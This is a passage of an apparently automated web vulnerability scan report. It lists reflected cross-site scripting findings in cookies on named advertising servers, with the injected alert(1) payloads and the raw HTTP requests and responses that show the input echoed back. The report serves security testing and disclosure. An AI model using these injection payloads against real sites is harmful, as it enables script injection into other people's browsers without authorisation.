User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&27999<script>alert(1)</script>2c482b2dc1b; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=38&initExp=Sun Apr 24 12:09:48 2011&recExp=Sat May 7 18:10:30 2011&prad=253735207&arc=206438264&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 13:59:48 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=39&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 13:59:48 2011&prad=256163696&arc=206438267&; expires=Sun 07-Aug-2011 13:59:48 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304949588; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25731

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"256163696",Pid:"p97174789",Arc:"206438267",Location:
...[SNIP]...
r 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&', "ar_p92429851": 'exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&27999<script>alert(1)</script>2c482b2dc1b', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:2
...[SNIP]...

3.133. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p97174789 cookie is copied into the HTML document as plain text between tags. The payload 987b0<script>alert(1)</script>64c88d49c21 was submitted in the ar_p97174789 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=256163696&AR_C=206438267 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=38&initExp=Sun Apr 24 12:09:48 2011&recExp=Sat May 7 18:10:30 2011&prad=253735207&arc=206438264&987b0<script>alert(1)</script>64c88d49c21; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 13:59:49 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=39&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 13:59:49 2011&987b0<script>alert(1)</script>64c88d49c21=&prad=256163696&arc=206438267&; expires=Sun 07-Aug-2011 13:59:49 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304949589; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25731

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"256163696",Pid:"p97174789",Arc:"206438267",Location:
...[SNIP]...
onload);
}}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Broker.Cookies={ "ar_p97174789": 'exp=38&initExp=Sun Apr 24 12:09:48 2011&recExp=Sat May 7 18:10:30 2011&prad=253735207&arc=206438264&987b0<script>alert(1)</script>64c88d49c21', "ar_p82806590": 'exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&', "ar_s_p81479006": '1', "ar_p90452457": 'exp=1&initExp=Thu May 5 00:58:23 201
...[SNIP]...

3.134. http://ar.voicefive.com/bmx3/broker.pli [ar_s_p81479006 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_s_p81479006 cookie is copied into the HTML document as plain text between tags. The payload 8ad1e<script>alert(1)</script>5447c5c1a44 was submitted in the ar_s_p81479006 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=256163696&AR_C=206438267 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=18ad1e<script>alert(1)</script>5447c5c1a44; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=38&initExp=Sun Apr 24 12:09:48 2011&recExp=Sat May 7 18:10:30 2011&prad=253735207&arc=206438264&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 13:59:48 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=39&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 13:59:48 2011&prad=256163696&arc=206438267&; expires=Sun 07-Aug-2011 13:59:48 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304949588; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25731

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"256163696",Pid:"p97174789",Arc:"206438267",Location:
...[SNIP]...
Exp=Sat May 7 18:10:30 2011&prad=253735207&arc=206438264&', "ar_p82806590": 'exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&', "ar_s_p81479006": '18ad1e<script>alert(1)</script>5447c5c1a44', "ar_p90452457": 'exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&', "ar_p84552060": 'exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19
...[SNIP]...

3.135. http://k.collective-media.net/cmadj/cm.tribune/uscell_ldev_300x600_05311 [cli cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.tribune/uscell_ldev_300x600_05311

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55fbe'%3balert(1)//18254b478a was submitted in the cli cookie. This input was echoed as 55fbe';alert(1)//18254b478a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.tribune/uscell_ldev_300x600_05311;tgt=brand;sz=300x600;net=cm;ord=5044004;ord1=680525;cmpgurl=http%253A//www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509%252C0%252C6839926.story? HTTP/1.1
Host: k.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e55fbe'%3balert(1)//18254b478a; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 13:59:39 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 13:59:39 GMT
Set-Cookie: qcms=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 13:59:39 GMT
Set-Cookie: nadp=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 13:59:39 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Mon, 09-May-2011 21:59:39 GMT
Content-Length: 8188

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-13247778_1304949579","http://ib.adnxs.com/ptj?member=311&inv_code=cm.tribune&size=300x600&imp_id=cm-13247778_1304949579,11f8f328940989e55fbe';alert(1)//18254b478a&referrer=http%3A%2F%2Fwww.orlandosentinel.com%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.story&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.tribune%2Fuscell_ldev_300x600_05311%3Bnet
...[SNIP]...

3.136. http://k.collective-media.net/cmadj/cm.tribune/uscell_ldev_300x600_05311 [cli cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.tribune/uscell_ldev_300x600_05311

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13d37"%3balert(1)//7538a7cb6f was submitted in the cli cookie. This input was echoed as 13d37";alert(1)//7538a7cb6f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.tribune/uscell_ldev_300x600_05311;tgt=brand;sz=300x600;net=cm;ord=5044004;ord1=680525;cmpgurl=http%253A//www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509%252C0%252C6839926.story? HTTP/1.1
Host: k.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e13d37"%3balert(1)//7538a7cb6f; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 13:59:39 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 13:59:39 GMT
Set-Cookie: qcms=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 13:59:39 GMT
Set-Cookie: nadp=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 13:59:39 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Mon, 09-May-2011 21:59:39 GMT
Content-Length: 8188

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
</scr'+'ipt>');CollectiveMedia.addPixel("http://ib.adnxs.com/mapuid?member=311&user=11f8f328940989e13d37";alert(1)//7538a7cb6f&seg_code=noseg&ord=1304949579",true);CollectiveMedia.addPixel("http://pixel.quantserve.com/pixel/p-86ZJnSph3DaTI.gif",false);CollectiveMedia.addPixel("http://r.nexac.com/e/getdata.xgi?dt=br&pkey=xkeii
...[SNIP]...

3.137. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.js [ruid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7856/12590/22782-15.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2652a"-alert(1)-"89c34a552b was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/7856/12590/22782-15.js?cb=0.3376502951141447&keyword=music HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; put_1986=2724386019227846218; cd=false; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ruid=2652a"-alert(1)-"89c34a552b; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675; rdk15=0; ses15=13549^1&13264^1; csi15=3200915.js^1^1304949679^1304949679&3151665.js^1^1304949670^1304949670; rdk=7858/13549; rdk2=0; ses2=12590^1&13549^1; csi2=3200913.js^1^1304949680^1304949680&3196046.js^1^1304949680^1304949680

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:04:58 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Mon, 09-May-2011 15:04:58 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 09-May-2011 15:04:58 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13549^1&13264^1&12590^1; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=64501; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3196048.js^1^1304949898^1304949898&3200915.js^1^1304949679^1304949679&3151665.js^1^1304949670^1304949670; expires=Mon, 16-May-2011 14:04:58 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2214

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3196048"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=2652a"-alert(1)-"89c34a552b\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

3.138. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.js [ruid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7856/12590/22782-2.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 838c4"-alert(1)-"8edc9ca69b8 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/7856/12590/22782-2.js?cb=0.24485393334180117&keyword=music HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; csi2=3204821.js^1^1304807875^1304807875; put_1986=2724386019227846218; cd=false; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ruid=838c4"-alert(1)-"8edc9ca69b8; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rdk15=0; ses15=13549^1; csi15=3151665.js^1^1304949670^1304949670; rdk=7858/13549; rdk9=0; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:02:55 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Mon, 09-May-2011 15:02:55 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Mon, 09-May-2011 15:02:55 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12590^1; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=64624; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3196046.js^1^1304949775^1304949775; expires=Mon, 16-May-2011 14:02:55 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2214

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3196046"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=838c4"-alert(1)-"8edc9ca69b8\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

3.139. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.js [ruid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7856/12590/22893-15.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9893"-alert(1)-"9508af4cd35 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/7856/12590/22893-15.js?cb=0.14613070245832205&keyword=music HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
